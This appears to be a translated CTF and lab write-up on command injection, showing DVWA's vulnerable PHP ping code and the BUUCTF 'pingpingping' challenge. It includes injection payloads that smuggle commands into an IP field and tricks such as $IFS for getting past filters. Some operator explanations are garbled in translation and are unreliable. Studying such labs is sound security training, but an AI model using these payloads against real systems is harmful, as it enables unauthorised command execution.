Command injection (DVWA+buuctf pingpingping)

Write in front

The command injection vulnerability is very similar to SQL injection and XSS vulnerabilities. It is also caused by developers' poor consideration. When using web applications to execute system commands, the characters entered by users are not filtered or the filtering is not strict. It often occurs in web applications with system commands, such as content management system (CMS).

That is, you can use some trick s at the command line execution positions such as cmd. Naturally, you will also think that there will be some keyword shielding in CTF. Of course, there are some bypass techniques.

Here is the command injection on dvwa and a CTF example to illustrate

DVWA command injection

The background code directly splices and executes the ping command without filtering the parameter ip value entered by the user. Therefore, we can use common command splicing characters to splice commands, such as "&", "|", "& &", "|" and "`" under linux system.

For shell1 & shell2, execute both shell1 and shell2 commands;

For shell1 & & shell2, if shell1 is executed successfully, shell2 will not be executed if shell1 fails, which is the same as the logic and;

For shell1 | shell2, "|" is the pipe character, which takes the execution result of shell1 as the input of shell2. Therefore, shell2 will be executed regardless of the execution result of shell1;

For shell1 | shell2, execute shell2 when shell1 fails, and shell2 will not be executed if shell1 succeeds, which is the same as logical or;

For shell1;shell2, shell1 and shell2 will be executed under Linux system;

For shell1 'shell2', the execution result of shell2 will be displayed in the error message of shell1.

Link to the original material here: https://blog.csdn.net/qq_32261191/article/details/101686779

dvwa-low


Source code:

Command Execution Source
<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
    
        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    } else { 
    
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    }
    
}
?>

It can execute commands directly without any filtering. We can use the above method to get more information

dvwa-medium

Source code:

Command Execution Source
<?php

if( isset( $_POST[ 'submit'] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Remove any of the charactars in the array (blacklist).
    $substitutions = array(
        '&&' => '',
        ';' => '',
    );

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    
    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
    
        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    } else { 
    
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    }
}

?>

There is blacklist filtering, but the blacklist is obviously incomplete. At the same time, it can be mixed and bypassed
such as

127.0.0.1&;&ls

127.0.0.1&ls

dvwa-high

Due to the problem of my version, it is impossible to inject in the high case. It is a written version
Source code:

Command Execution Source
<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST["ip"];
    
    $target = stripslashes( $target );
    
    
    // Split the IP into 4 octects
    $octet = explode(".", $target);
    
    // Check IF each octet is an integer
    if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4)  ) {
    
    // If all 4 octets are int's put the IP back together.
    $target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];
    
    
        // Determine OS and execute the ping command.
        if (stristr(php_uname('s'), 'Windows NT')) { 
    
            $cmd = shell_exec( 'ping  ' . $target );
            echo '<pre>'.$cmd.'</pre>';
        
        } else { 
    
            $cmd = shell_exec( 'ping  -c 3 ' . $target );
            echo '<pre>'.$cmd.'</pre>';
        
        }
    
    }
    
    else {
        echo '<pre>ERROR: You have entered an invalid IP</pre>';
    }
    
    
}

?>

This verification can first remove the backslash in the input value, split the payload into an array with. As the flag, and then confirm whether each section is an array, and the last summary will limit the length.

This is also a way to prevent.

Example: buuctf pingpingping

After opening, there is a typical interface for checking ip, which can write ls and other commands

During detection, it can be felt that sensitive words are shielded, and an error will be reported if detected. Mixed writing or double writing bypass is not allowed

The key is to shield the flag keyword

There is also an index file, but spaces are shielded.
Therefore, supplementary knowledge:
In bash, you can have the following poses by bypassing spaces
①<>

②%20(space)

③%09(tab)

④$IFS$9

After testing, we can only use the fourth type. The so-called IFS is the separator.
payload:

127.0.0.1;cat$IFS$1index.php


For the regularity of flag, you can't write more in flag, such as fllag
payload:

?ip=123;a=ag;b=fl;cat$IFS$9$b$a.php

Pay attention to write ag before fl

Tags: Linux PHP bash Cyber Security

Posted by A JM on Mon, 20 Sep 2021 18:35:25 +0530

Hot Tags

©2023 Programs Team